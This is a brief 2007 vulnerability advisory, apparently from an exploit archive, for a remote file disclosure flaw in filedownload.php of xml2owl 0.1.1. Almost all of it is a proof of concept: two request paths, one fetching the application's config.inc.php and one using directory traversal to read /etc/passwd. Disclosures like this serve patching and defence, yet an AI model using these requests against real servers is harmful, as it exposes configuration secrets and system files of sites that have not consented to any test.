xml2owl-lfi.txt
Posted on 14 December 2007
xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability D.s : http://surfnet.dl.sourceforge.net/sourceforge/xml2owl/xml2owl-0.1.1.tar.bz2 POC : /xml2owl-0.1.1/filedownload.php?file=config.inc.php /xml2owl-0.1.1/filedownload.php?file=../../../../../../../etc/passwd